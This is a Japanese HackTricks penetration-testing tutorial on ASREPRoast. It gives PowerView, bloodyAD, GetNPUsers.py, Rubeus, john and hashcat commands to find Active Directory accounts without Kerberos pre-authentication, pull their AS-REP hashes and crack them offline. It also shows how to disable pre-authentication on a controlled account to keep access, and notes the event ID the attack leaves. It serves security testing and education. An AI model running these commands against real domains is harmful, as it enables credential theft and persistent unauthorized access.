7.7 KiB
ASREPRoast
AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をご覧ください!
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください!
- 公式PEASS & HackTricksグッズを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションをご覧ください
- 💬 Discordグループに参加するか、テレグラムグループに参加するか、Twitter 🐦 @carlospolopmをフォローしてください。
- HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有してください。
![](/Mirrors/hacktricks/media/commit/ccbee5cc3277a8b37cead00a01eac805a3dbb87c/.gitbook/assets/image%20%281%29%20%283%29%20%281%29.png)
経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取るためにHackenProof Discordサーバーに参加しましょう!
ハッキングの洞察
ハッキングのスリルと挑戦に焦点を当てたコンテンツに参加する
リアルタイムハックニュース
リアルタイムのニュースと洞察を通じて、速いペースのハッキングの世界に追いつく
最新の発表
最新のバグバウンティの開始と重要なプラットフォームの更新情報を入手する
今すぐ Discord に参加して、トップハッカーとのコラボレーションを始めましょう!
ASREPRoast
ASREPRoast攻撃は、Kerberos事前認証が必要でない属性を持つユーザー(DONT_REQ_PREAUTH_**)**を探します。
これは、誰でもそれらのユーザーの代わりにDCにAS_REQリクエストを送信し、AS_REPメッセージを受け取ることができることを意味します。この最後の種類のメッセージには、そのユーザーのパスワードから派生した元のユーザーキーで暗号化されたデータのチャンクが含まれています。その後、このメッセージを使用して、ユーザーパスワードをオフラインでクラックすることができます。
さらに、この攻撃を実行するためにドメインアカウントは必要ありません。DCへの接続のみが必要です。しかし、ドメインアカウントがある場合、LDAPクエリを使用してドメイン内のKerberos事前認証がないユーザーを取得することができます。そうでなければユーザー名を推測する必要があります。
脆弱なユーザーの列挙(ドメイン資格情報が必要)
{% code title="Windowsを使用する" %}
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
{% endcode %}
{% code title="Linuxを使用する" %}
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName
AS_REPメッセージのリクエスト
{% code title="Linux使用時" %}
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
{% endcode %}
{% code title="Windowsを使用する場合" %}
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
{% endcode %}
{% hint style="warning" %} Rubeusを使用したAS-REP Roastingは、暗号化タイプが0x17、事前認証タイプが0の4768を生成します。 {% endhint %}
クラッキング
john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
永続性
GenericAll 権限(またはプロパティ書き込み権限)を持つユーザーに対して、preauth が不要になるように強制します:
{% code title="Windows 使用時" %}
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
{% endcode %}
{% code title="Linuxを使用する" %}
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH
{% endcode %}
参考文献
AS-REPロースティングについての詳細はired.teamで
![](/Mirrors/hacktricks/media/commit/ccbee5cc3277a8b37cead00a01eac805a3dbb87c/.gitbook/assets/image%20%281%29%20%283%29%20%281%29.png)
経験豊富なハッカーやバグバウンティハンターと交流するためにHackenProof Discordサーバーに参加しましょう!
ハッキングの洞察
ハッキングのスリルと挑戦に焦点を当てたコンテンツに参加する
リアルタイムハックニュース
リアルタイムのニュースと洞察を通じて、速いペースで変化するハッキングの世界を最新の状態に保つ
最新の発表
新しいバグバウンティの開始や重要なプラットフォームの更新情報を入手する
今すぐ Discord に参加して、トップハッカーとのコラボレーションを始めましょう!
htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローに学ぶ
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください!
- 公式のPEASS & HackTricksグッズを手に入れる
- The PEASS Familyを発見する、私たちの独占的なNFTsのコレクション
- 💬 Discordグループやテレグラムグループに参加するか、Twitter 🐦 @carlospolopmでフォローする。
- HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。